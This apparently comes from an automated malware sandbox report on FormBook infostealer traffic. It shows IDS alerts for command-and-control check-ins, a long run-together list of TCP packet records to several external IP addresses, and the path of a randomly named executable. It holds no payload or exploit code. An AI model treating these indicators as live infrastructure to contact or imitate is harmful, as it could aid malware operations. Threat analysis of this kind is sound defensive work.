| 2024-09-25T09:17:44.301084+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49743 | 3.33.130.190 | 80 | TCP |
| 2024-09-25T09:18:05.939548+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49747 | 52.223.13.41 | 80 | TCP |
| 2024-09-25T09:18:19.934267+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49751 | 38.47.232.144 | 80 | TCP |
| 2024-09-25T09:18:33.704910+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49755 | 52.230.28.86 | 80 | TCP |
| 2024-09-25T09:18:48.608515+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49759 | 133.130.35.90 | 80 | TCP |
| 2024-09-25T09:19:02.055491+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49763 | 52.223.13.41 | 80 | TCP |
| 2024-09-25T09:19:15.269086+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49767 | 84.32.84.32 | 80 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Sep 25, 2024 09:16:19.313298941 CEST8049715199.59.243.227192.168.2.8
                                                              Sep 25, 2024 09:16:19.313325882 CEST8049715199.59.243.227192.168.2.8
                                                              Sep 25, 2024 09:16:19.313359022 CEST4971580192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:19.313396931 CEST4971580192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:20.379203081 CEST4971580192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:21.399027109 CEST4971680192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:21.404056072 CEST8049716199.59.243.227192.168.2.8
                                                              Sep 25, 2024 09:16:21.404285908 CEST4971680192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:21.419265032 CEST4971680192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:21.426006079 CEST8049716199.59.243.227192.168.2.8
                                                              Sep 25, 2024 09:16:21.426126957 CEST8049716199.59.243.227192.168.2.8
                                                              Sep 25, 2024 09:16:21.858835936 CEST8049716199.59.243.227192.168.2.8
                                                              Sep 25, 2024 09:16:21.858859062 CEST8049716199.59.243.227192.168.2.8
                                                              Sep 25, 2024 09:16:21.858880043 CEST8049716199.59.243.227192.168.2.8
                                                              Sep 25, 2024 09:16:21.858947992 CEST4971680192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:21.858947992 CEST4971680192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:22.926089048 CEST4971680192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:23.951841116 CEST4971780192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:23.956845999 CEST8049717199.59.243.227192.168.2.8
                                                              Sep 25, 2024 09:16:23.956928968 CEST4971780192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:23.964817047 CEST4971780192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:23.969594002 CEST8049717199.59.243.227192.168.2.8
                                                              Sep 25, 2024 09:16:24.413008928 CEST8049717199.59.243.227192.168.2.8
                                                              Sep 25, 2024 09:16:24.413028002 CEST8049717199.59.243.227192.168.2.8
                                                              Sep 25, 2024 09:16:24.413043022 CEST8049717199.59.243.227192.168.2.8
                                                              Sep 25, 2024 09:16:24.413192987 CEST4971780192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:24.413250923 CEST4971780192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:24.424282074 CEST4971780192.168.2.8199.59.243.227
                                                              Sep 25, 2024 09:16:24.429152012 CEST8049717199.59.243.227192.168.2.8
                                                              Sep 25, 2024 09:16:29.720870972 CEST4971880192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:29.725995064 CEST8049718198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:29.726243973 CEST4971880192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:29.737099886 CEST4971880192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:29.742104053 CEST8049718198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:30.318598986 CEST8049718198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:30.318680048 CEST8049718198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:30.318774939 CEST4971880192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:31.238941908 CEST4971880192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:32.257496119 CEST4971980192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:32.264559984 CEST8049719198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:32.264780045 CEST4971980192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:32.276554108 CEST4971980192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:32.281579018 CEST8049719198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:32.849601030 CEST8049719198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:32.849661112 CEST8049719198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:32.849762917 CEST4971980192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:33.785552025 CEST4971980192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:34.804519892 CEST4972080192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:34.809428930 CEST8049720198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:34.809619904 CEST4972080192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:34.821712017 CEST4972080192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:34.826562881 CEST8049720198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:34.826680899 CEST8049720198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:35.391519070 CEST8049720198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:35.391558886 CEST8049720198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:35.391652107 CEST4972080192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:36.332324028 CEST4972080192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:37.352861881 CEST4972280192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:37.357806921 CEST8049722198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:37.357877970 CEST4972280192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:37.395792961 CEST4972280192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:37.400681973 CEST8049722198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:37.932672977 CEST8049722198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:37.932703972 CEST8049722198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:37.932974100 CEST4972280192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:37.935745001 CEST4972280192.168.2.8198.252.106.191
                                                              Sep 25, 2024 09:16:37.940690994 CEST8049722198.252.106.191192.168.2.8
                                                              Sep 25, 2024 09:16:42.970859051 CEST4972480192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:42.975780010 CEST80497243.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:42.975893021 CEST4972480192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:42.987644911 CEST4972480192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:42.992574930 CEST80497243.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:43.447030067 CEST80497243.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:43.447215080 CEST4972480192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:44.504564047 CEST4972480192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:44.509394884 CEST80497243.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:45.523083925 CEST4972580192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:45.528018951 CEST80497253.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:45.528147936 CEST4972580192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:45.539611101 CEST4972580192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:45.544712067 CEST80497253.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:46.923213005 CEST80497253.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:46.923285961 CEST4972580192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:47.051012039 CEST4972580192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:47.055835962 CEST80497253.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:48.070174932 CEST4972680192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:48.075191975 CEST80497263.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:48.075274944 CEST4972680192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:48.087086916 CEST4972680192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:48.091862917 CEST80497263.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:48.091990948 CEST80497263.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:49.449801922 CEST80497263.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:49.449855089 CEST4972680192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:49.597923040 CEST4972680192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:49.602828026 CEST80497263.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:50.617351055 CEST4972780192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:50.622153044 CEST80497273.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:50.622225046 CEST4972780192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:50.629978895 CEST4972780192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:50.634718895 CEST80497273.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:51.106215954 CEST80497273.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:51.106297970 CEST80497273.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:51.106406927 CEST4972780192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:51.111072063 CEST4972780192.168.2.83.33.130.190
                                                              Sep 25, 2024 09:16:51.115892887 CEST80497273.33.130.190192.168.2.8
                                                              Sep 25, 2024 09:16:56.216667891 CEST4972880192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:16:56.221549034 CEST8049728148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:16:56.224591970 CEST4972880192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:16:56.236960888 CEST4972880192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:16:56.241877079 CEST8049728148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:16:56.878567934 CEST8049728148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:16:56.878588915 CEST8049728148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:16:56.878607035 CEST8049728148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:16:56.878632069 CEST4972880192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:16:56.878667116 CEST4972880192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:16:57.738732100 CEST4972880192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:16:58.757114887 CEST4972980192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:16:58.762139082 CEST8049729148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:16:58.762226105 CEST4972980192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:16:58.774002075 CEST4972980192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:16:58.778912067 CEST8049729148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:16:59.405158997 CEST8049729148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:16:59.405184984 CEST8049729148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:16:59.405205965 CEST8049729148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:16:59.405237913 CEST4972980192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:16:59.405281067 CEST4972980192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:17:00.286372900 CEST4972980192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:17:01.313574076 CEST4973080192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:17:01.318336010 CEST8049730148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:17:01.318402052 CEST4973080192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:17:01.332737923 CEST4973080192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:17:01.337594032 CEST8049730148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:17:01.337729931 CEST8049730148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:17:01.988332987 CEST8049730148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:17:01.988351107 CEST8049730148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:17:01.988367081 CEST8049730148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:17:01.988598108 CEST4973080192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:17:02.848069906 CEST4973080192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:17:03.867435932 CEST4973180192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:17:03.872360945 CEST8049731148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:17:03.872452974 CEST4973180192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:17:03.881491899 CEST4973180192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:17:03.886276960 CEST8049731148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:17:04.515032053 CEST8049731148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:17:04.515047073 CEST8049731148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:17:04.515104055 CEST8049731148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:17:04.515185118 CEST4973180192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:17:04.515213013 CEST4973180192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:17:04.517949104 CEST4973180192.168.2.8148.251.114.233
                                                              Sep 25, 2024 09:17:04.522732019 CEST8049731148.251.114.233192.168.2.8
                                                              Sep 25, 2024 09:17:09.687408924 CEST4973280192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:09.692291975 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:09.692362070 CEST4973280192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:09.704190969 CEST4973280192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:09.708981037 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.284580946 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.284598112 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.284610033 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.284650087 CEST4973280192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:10.284784079 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.284795046 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.284805059 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.284816027 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.284833908 CEST4973280192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:10.284861088 CEST4973280192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:10.285383940 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.285393953 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.285406113 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.285432100 CEST4973280192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:10.285465002 CEST4973280192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:10.289688110 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.289701939 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.289715052 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.289730072 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.289746046 CEST4973280192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:10.289771080 CEST4973280192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:10.289799929 CEST8049732209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:10.289838076 CEST4973280192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:11.208446980 CEST4973280192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:12.226865053 CEST4973380192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:12.231904030 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.231997967 CEST4973380192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:12.245866060 CEST4973380192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:12.250842094 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.820014954 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.820029974 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.820066929 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.820071936 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.820084095 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.820091009 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.820105076 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.820111036 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.820127010 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.820131063 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.820163012 CEST4973380192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:12.822380066 CEST4973380192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:12.825190067 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.825196028 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.825205088 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.825212002 CEST8049733209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:12.825448990 CEST4973380192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:13.754228115 CEST4973380192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:14.772803068 CEST4973480192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:14.777882099 CEST8049734209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:14.777970076 CEST4973480192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:14.789195061 CEST4973480192.168.2.8209.74.95.29
                                                              Sep 25, 2024 09:17:14.794089079 CEST8049734209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:14.794126987 CEST8049734209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:15.383615971 CEST8049734209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:15.383632898 CEST8049734209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:15.383646965 CEST8049734209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:15.383660078 CEST8049734209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:15.383671999 CEST8049734209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:17:15.383688927 CEST8049734209.74.95.29192.168.2.8
                                                              Sep 25, 2024 09:18:53.883563995 CEST4976080192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:53.895301104 CEST4976080192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:53.900242090 CEST804976052.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:54.349184990 CEST804976052.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:54.349247932 CEST4976080192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:55.410728931 CEST4976080192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:55.459512949 CEST804976052.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:56.429601908 CEST4976180192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:56.434432030 CEST804976152.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:56.434559107 CEST4976180192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:56.445892096 CEST4976180192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:56.450793028 CEST804976152.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:56.893059969 CEST804976152.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:56.893661022 CEST4976180192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:57.958519936 CEST4976180192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:57.963270903 CEST804976152.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:58.978490114 CEST4976280192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:58.986721039 CEST804976252.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:58.990483999 CEST4976280192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:58.997534037 CEST4976280192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:18:59.002962112 CEST804976252.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:59.002973080 CEST804976252.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:59.447691917 CEST804976252.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:18:59.447746992 CEST4976280192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:19:00.510485888 CEST4976280192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:19:00.515475035 CEST804976252.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:19:01.524998903 CEST4976380192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:19:01.529861927 CEST804976352.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:19:01.529923916 CEST4976380192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:19:01.538702965 CEST4976380192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:19:01.543458939 CEST804976352.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:19:02.053178072 CEST804976352.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:19:02.053204060 CEST804976352.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:19:02.055490971 CEST4976380192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:19:02.058530092 CEST4976380192.168.2.852.223.13.41
                                                              Sep 25, 2024 09:19:02.063309908 CEST804976352.223.13.41192.168.2.8
                                                              Sep 25, 2024 09:19:07.143913984 CEST4976480192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:07.148880959 CEST804976484.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:07.148951054 CEST4976480192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:07.162679911 CEST4976480192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:07.167622089 CEST804976484.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:07.604438066 CEST804976484.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:07.604490995 CEST4976480192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:08.681060076 CEST4976480192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:08.685903072 CEST804976484.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:09.697825909 CEST4976580192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:09.702713013 CEST804976584.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:09.706497908 CEST4976580192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:09.721467018 CEST4976580192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:09.726376057 CEST804976584.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:10.163608074 CEST804976584.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:10.168190956 CEST4976580192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:11.223145008 CEST4976580192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:11.229034901 CEST804976584.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:12.242031097 CEST4976680192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:12.247061968 CEST804976684.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:12.249654055 CEST4976680192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:12.262540102 CEST4976680192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:12.267513037 CEST804976684.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:12.267551899 CEST804976684.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:12.860840082 CEST804976684.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:12.862597942 CEST4976680192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:13.770020962 CEST4976680192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:13.774936914 CEST804976684.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:14.790469885 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:14.795664072 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:14.798679113 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:14.806569099 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:14.811439991 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.268935919 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.268954039 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.268966913 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269047022 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269059896 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269078970 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269085884 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:15.269092083 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269105911 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269119024 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269133091 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269140005 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:15.269159079 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:15.269171000 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:15.269668102 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:15.269717932 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:15.275779963 CEST4976780192.168.2.884.32.84.32
                                                              Sep 25, 2024 09:19:15.281729937 CEST804976784.32.84.32192.168.2.8
                                                              Sep 25, 2024 09:19:28.976799011 CEST4976880192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:28.982763052 CEST8049768188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:19:28.983206987 CEST4976880192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:28.994537115 CEST4976880192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:28.999433994 CEST8049768188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:19:30.504493952 CEST4976880192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:30.509856939 CEST8049768188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:19:30.512619972 CEST4976880192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:31.523960114 CEST4976980192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:31.528888941 CEST8049769188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:19:31.528980017 CEST4976980192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:31.543590069 CEST4976980192.168.2.8188.114.96.3
                                                              Sep 25, 2024 09:19:31.548469067 CEST8049769188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:19:33.575815916 CEST8049769188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:19:33.576016903 CEST8049769188.114.96.3192.168.2.8
                                                              Sep 25, 2024 09:19:33.576069117 CEST4976980192.168.2.8188.114.96.3
                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              0 | 192.168.2.8 | 49712 | 188.114.96.3 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
